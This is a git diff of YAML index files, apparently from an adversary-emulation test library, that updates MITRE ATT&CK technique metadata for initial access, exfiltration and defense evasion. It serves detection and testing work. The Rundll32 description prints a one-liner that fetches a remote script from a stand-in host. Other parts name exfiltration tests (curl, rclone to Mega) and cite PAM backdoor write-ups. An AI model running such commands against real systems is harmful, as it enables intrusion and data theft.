       - 'Network Traffic: Network Traffic Content'
@@ -118482,13 +119381,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -118528,8 +119426,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -118537,13 +119437,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -118574,9 +119474,6 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -118777,7 +119674,7 @@ initial-access:
           '
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -118844,11 +119741,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -118900,9 +119796,8 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -119158,7 +120053,7 @@ initial-access:
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -119182,10 +120077,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -119204,13 +120098,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -119249,9 +120142,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -119301,7 +120193,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -119321,7 +120212,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -119341,8 +120232,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -119389,7 +120278,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -119409,7 +120297,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -119431,8 +120319,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -119486,7 +120372,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests:
     - name: IcedID Botnet HTTP PUT
@@ -119572,7 +120457,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -119607,12 +120492,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -119637,11 +120520,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -119684,9 +120566,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -119733,7 +120614,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -119759,7 +120639,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -119792,8 +120672,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests:
     - name: Exfiltrate data HTTPS using curl windows
@@ -119902,7 +120780,7 @@ exfiltration:
           '
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -119951,7 +120829,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests:
     - name: C2 Data Exfiltration
@@ -120015,7 +120892,7 @@ exfiltration:
         name: powershell
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -120051,12 +120928,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -120065,7 +120941,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -120089,9 +120964,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - SSH
@@ -120217,7 +121091,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -120239,8 +121113,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -120291,7 +121163,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests:
     - name: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
@@ -120367,7 +121238,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests:
     - name: Exfiltrate data with rclone to cloud Storage - Mega (Windows)
@@ -120454,7 +121324,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -120477,8 +121347,6 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests:
     - name: Data Transfer Size Limits
@@ -120553,7 +121421,7 @@ exfiltration:
           $file.Close()
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -120594,9 +121462,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -120644,7 +121511,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -120666,7 +121532,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -120690,12 +121556,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -120759,7 +121623,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - HTTP
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index ff933281bb..ce1d9381ff 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
